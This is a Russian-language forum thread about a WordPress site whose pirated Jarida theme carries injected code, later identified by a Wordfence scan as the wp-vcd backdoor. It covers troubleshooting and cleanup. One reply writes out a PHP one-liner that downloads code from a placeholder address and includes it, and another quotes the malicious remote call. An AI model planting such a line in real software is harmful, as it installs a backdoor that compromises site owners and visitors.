Помогите исправить ошибку (Вордпресс)
Страницы: 1 2 След.
Помогите исправить ошибку (Вордпресс), Ошибка в functions.пхп
Собственно сабж. На сайте Вордпресс в файле functions.php появилась ошибка, вернее целый ряд ошибок вызванных одной smile:mad: проблемой:

"file_get_contents(http://www.название сайта*/code.php): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known"


Понятное дело, что ссылка ведёт на несуществующий ресурс, и долбит запросами сервер. В следствии чего тормоза и прочие неприятности. Как, и когда эта ссылка там появилась, понятия не имею. Озаботился поисками после явных проблем. Тест проводился плагином "Query Monitor" (см. скрин). Поочерёдное отключение немалой гирлянды плагинов к успеху не привело. Может уважаемое сообщество что то посоветует? Как безопасно решить проблему? Буду рад, если найдётся специалист (!), который ручками решит эту и ещё пару - тройку проблем на сайте. (в лич.)

Комплексное SEO продвижение в поисковых системах Яндекс, Google

Обнови тему принудительно
Цитата
Wordpresser пишет:
Обнови тему принудительно
Тему обновить не могу, потому, что в неё, в стили и проч, были внесены существенные изменения. Всё слетит в ноль. Нельзя.
Попробуйте подменить functions.php на файл из оригинальной темы из коробки.
Или закомментировать строки. То, что неизвестно откуда там эти ссылки - это плохо.

Ну и еще есть пара вариантов - но это в личку.
Поздравляю, вам очень повезло. Я серьезно.
Вы скачали из интернета тему с доступных источников, в котором УЖЕ были вшиты ссылки на выполнение левых скриптов с сайта http://yatots.com/. Частая фигня, люди думают, что добрые люди просто так выкладывают ворованные темы, поэтому покупать их не надо. в 70% платных тем, которые можно скачать нахаляву, вшит левый код. Проверенная десятки раз инфа.
В чем везение: пираты, которые вшили код, забыли продлить свой домен, и теперь вы знаете, что в файле functions.php лежит код, который вызывал левый код. А так бы работал бы ваш сайт и делал бы нечто свое, чего вы и знать то не хотите.
всех дел то зайти в этот файл и закомментить 110 127 и 143 строки, и тадам, проблема решена.
Услышь мой рев!
----------
И опыт, сын ошибок трудных, и гений, парадоксов друг.
Цитата
Охотник за хайпом пишет:
закомментить 110 127 и 143 строки
А по подробней можно код? Тоже джарида но проблем вроде не было
Цитата
Охотник за хайпом пишет:
Поздравляю, вам очень повезло. Я серьезно.
на самом деле, да, повезло. Но тут сейчас с мокрыми штанами надо шерстить ТСу ВСЁ, что сейчас на хосте, мало ли, что чужой скрипт где прописал...
Минуту еще, мой ветер не стих, Мне нравится здесь в Королевстве Кривых...
Цитата
WGN пишет:
Цитата
Охотник за хайпом пишет:
закомментить 110 127 и 143 строки
А по подробней можно код? Тоже джарида но проблем вроде не было
так и у него проблем не было, пока пираты не облажались.
у всех по разному, прописать код можно куда угодно и он может быть каким угодно. все очень индивидуально. на каких то сайтах он просто в код страницы вставляет линейку скрытых ссылок на другие ресурсы (самый безобидный вариант, хотя есть еще безобидней - вообще ничего не делает, а лежит, ожидая команды). На каких то - рассылает спам. На каких то методично распихивает себя по куче разных файлов, чтоб потом бумкнуть сразу жетско, на каких то просто раз в несколько месяцев делает дефейс и прославляет тайских хакеров.
Все индивидуально и очень разнообразно.
В этом конкретном случае там строка типа 

$а = file_get_contents('http\\чототам.com');
Цитата
Охотник за хайпом пишет:
В этом конкретном случае там строка типа

$а = file_get_contents('http\\чототам.com');
пустите меня к армии ВордПресс! всего одну (в идеале)строчку надо добавить: 
Код
file_put_contents('неважно.php',file_get_contents(моё адресо));include('неважно.php');
Спасибо что откликнулись! smile:shout:

В то время, пока Вы собирались с мыслями, я не сидел сложа руки перелопатив гору форумов, старых и новых (!!) тем по проблеме.
Итак, сразу отвечу на вопросы:
1. Нет, в файле функций "из коробки" этих ссылок и кодов нет.
2. WGN - строки 110 127 и 143 это порядковые строки из functions.php
3. Просто закомментировать? Да, пожалуй так и сделаю, спасибо.

Но, всё оказалось хуже.

Плагином "Query Monitor" я последний раз пользовался давненько, при переезде на новый сервер. Тогда этих проблем не было, но и косяков явных на сайте не было. А ведь кипеж начался, когда участились тормоза и подвисания в админке,.. то есть совсем таки недавно. Всё как обычно, гром не грянет, мужик не перекрестится. smile:mad:


На форумах по теме таких криков немало. И советов массы.. просто МАССЫ!! но вся суть в одном. Вирусят, вирусили и будут нас вирусить, сучьи дети.


Короче из килотонн инфы я извлёк таки крупицу разума.
Ищем вирус. Ставим Ворддефенс и сканируем.

Получаем на выходе список косяков и подозрений, с рекомендациями типа, для нашего случая с функциями:

Filename: wp-content/themes/jarida/functions.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: $div_code_name="wp_vcd";

The infection type is: Backdoor:PHP/wp-vcd
Description: Backdoor used for backlink injection and other malicious activity.




Что в целом говорит, мол:
"Подробности. Этот файл, как установлено, установлен или изменен хакером для выполнения злонамеренных действий. Если вы знаете об этом файле, вы можете игнорировать его, чтобы исключить его из будущих сканирований. Текст, найденный в этом файле, который соответствует известному вредоносному файлу: $ div_code_name = "wp_vcd";"

Короче, вражина подсадил в папку wp-includes файлик - wp-vcd.php который находится в ядре WordPress, но не распространяется с этой версией WordPress. Обычно это связано с тем, что он оставлен из предыдущего обновления WordPress, но он также может быть добавлен другим плагином или вредоносным файлом, добавленным злоумышленником. (прим - это гугл переводчик).

Лечение - найти и просто удалить. Подсказали на форумах.


Плагин предложил "подлечить" проблему в один клик. Я вздрогнул.smile:D Знаем мы таких лекарей.

Поэтому на роль камикадзе я определил другой сайт, просто заготовку, который расположен на моём хостинге и что бы вы думали? Он тоже оказался инфицирован болезнями основного сайта. Стало быть вирус вовсю гуляет по серверу! Я кинулся проверять сателлиты.. увы, они кашляли теми же соплями.


Но ладно.. будем лечить. Пробую (по совету плагина) "подлечить" камикадзе.. Жму. ...
Бац! и.. он перевёл явную ошибку в раздел "Подозрительный элемент". Дышать стало легче, но проблема то осталась. К тому же, оказалось что вирус не один. И в Инклудах сидят ещё диверсанты. Но хорошо, что вражина обнаружен, буду теперь отлавливать и расстреливать по одному.


Второй скрин с подопытного сайта. На основном проблем побольше.


Так что джентльмены, рекомендую озаботиться безопасностью. Враг не дремлет, коварен и изобретателен ссук.
Цитата
Сергей Храбров пишет:
Спасибо что откликнулись! smile:shout:

В то время, пока Вы собирались с мыслями, я не сидел сложа руки перелопатив гору форумов, старых и новых (!!) тем по проблеме.
Итак, сразу отвечу на вопросы:
1. Нет, в файле функций "из коробки" этих ссылок и кодов нет.
2. WGN - строки 110 127 и 143 это порядковые строки из functions.php
3. Просто закомментировать? Да, пожалуй так и сделаю, спасибо.

Но, всё оказалось хуже.

Плагином "Query Monitor" я последний раз пользовался давненько, при переезде на новый сервер. Тогда этих проблем не было, но и косяков явных на сайте не было. А ведь кипеж начался, когда участились тормоза и подвисания в админке,.. то есть совсем таки недавно. Всё как обычно, гром не грянет, мужик не перекрестится. smile:mad:


На форумах по теме таких криков немало. И советов массы.. просто МАССЫ!! но вся суть в одном. Вирусят, вирусили и будут нас вирусить, сучьи дети.


Короче из килотонн инфы я извлёк таки крупицу разума.
Ищем вирус. Ставим Ворддефенс и сканируем.

Получаем на выходе список косяков и подозрений, с рекомендациями типа, для нашего случая с функциями:

Filename: wp-content/themes/jarida/functions.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: $div_code_name="wp_vcd";

The infection type is: Backdoor:pHP/wp-vcd
Description: Backdoor used for backlink injection and other malicious activity.



Что в целом говорит, мол:
"Подробности. Этот файл, как установлено, установлен или изменен хакером для выполнения злонамеренных действий. Если вы знаете об этом файле, вы можете игнорировать его, чтобы исключить его из будущих сканирований. Текст, найденный в этом файле, который соответствует известному вредоносному файлу: $ div_code_name = "wp_vcd";"

Короче, вражина подсадил в папку wp-includes файлик - wp-vcd.php который находится в ядре WordPress, но не распространяется с этой версией WordPress. Обычно это связано с тем, что он оставлен из предыдущего обновления WordPress, но он также может быть добавлен другим плагином или вредоносным файлом, добавленным злоумышленником. (прим - это гугл переводчик).

Лечение - найти и просто удалить. Подсказали на форумах.


Плагин предложил "подлечить" проблему в один клик. Я вздрогнул.smile:D Знаем мы таких лекарей.

Поэтому на роль камикадзе я определил другой сайт, просто заготовку, который расположен на моём хостинге и что бы вы думали? Он тоже оказался инфицирован болезнями основного сайта. Стало быть вирус вовсю гуляет по серверу! Я кинулся проверять сателлиты.. увы, они кашляли теми же соплями.


Но ладно.. будем лечить. Пробую (по совету плагина) "подлечить" камикадзе.. Жму. ...
Бац! и.. он перевёл явную ошибку в раздел "Подозрительный элемент". Дышать стало легче, но проблема то осталась. К тому же, оказалось что вирус не один. И в Инклудах сидят ещё диверсанты. Но хорошо, что вражина обнаружен, буду теперь отлавливать и расстреливать по одному.


Второй скрин с подопытного сайта. На основном проблем побольше.


Так что джентльмены, рекомендую озаботиться безопасностью. Враг не дремлет, коварен и изобретателен ссук.
мда уж, не повезло. Если есть возможность - изолируйте каждый сайт, и вычищайте злыдней по одному. Плавали - знаем, врагу не посоветую. С тех пор у меня все сайты на отдельных акках.
Цитата
WGN пишет:
А по подробней можно код? Тоже джарида но проблем вроде не было
Закомментировать строки в php файлах - это значит закомментировать. Так например:
Код
// file_get_contents (http://www.название сайта*/code.php) тут еще какой-то код в строке // nnnnnnnnnnnnnnnnnnn

Где символы // - это символы комментирования

nnn - это ваш необязательный комментарий

Символы // должны быть обязательно в начале строки не нужного кода и иметь отступ в 1-2 пробела.
Спасибо всем за ответы - таких проблем не оказалось, по крайней мере не выявилsmile:)
Ну пользуясь случаем, чтобы новую тему не создавать. Уважаемые форумчане, я на Вордпрес совсем недавно. Подскажите какая страница там отвечает как страница материала и комментария (ну если судить по юкозу). Просто внутри материала надо дописать в титле h1 дополнение, но не могу найти где это вставить.
На самом деле, очень плохо, когда человек понятия не имеет, что и как происходит на его хосте. Сложностей много...smile:D Сами по себе работают какие-то плагины, что-то там делают, неизвестно как, неизвестно почему, могут быть ещё и с бомбой плагины smile:eek:, которые и так непонятно как и что делали, а теперь ещё и с внешим миром общаются без особого желания хозяина. smile:cool: Тяжела жизнь тех, кто влез в производственный процесс, но не хочет в него вникать, а тупо ест, что нашёл бесплатное. Современные менеджеры - они такие, да...
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
03:50 18.09.2020 АП ИКС? 
02:11 Проверенные партнёрские программы. А какими пользуетесь вы? 
23:18 Обновление ИКС без АПдейта, а индивидуально? 
21:23 R-money.ru Заработай на рефератах 
21:21 WelcomePartners – ведущая гемблинг партнерка рунета! 
20:20 Наставление начинающим свой путь заработка с помощью Яндекс.Дзен 
20:10 Сайт выпал с индекса / Виноваты прогоны 
03:18 Размещаем Отзывы на Яндекс картах, маркете 
01:53 Мощный микс прогон 1500-2500 ссылок + 2 крутых темы продвижения 
20:32 Продвижения вашего сайта прогонами по базе с ИСК до 46000. Рост позиций по СЧ и НЧ запросам + рост ИКС 
18:50 Накручу повиденческие на Вашем сайте! 
17:49 Профильный прогон 200 рублей, Тиц (Икс) от 10, проверен Checktrust 
14:49 Комплексный прогон по трастовым сайтам, статейное размещение. Рост НЧ-СЧ, Тиц-пр. 
13:30 BestChange – обменивать электронную валюту можно быстро и выгодно 
19:45 В первом постЕ или постУ? в теме 
19:44 Пора отжимать Гугл, Ютуб, Фейсбук, Инстаграм и т.д. 
19:12 [b]Webvork [/b]- международная товарная СРА сеть с сертифицированными офферами на Европу. 
18:42 Посоветуйте фильм - фантастику 
13:06 Увеличение посещаемости игрового сайта 
08:16 Не обрезанный друг 
18:00 CBDPartners - лучшее решение для CBD трафика, запрыгивай в новую нишу!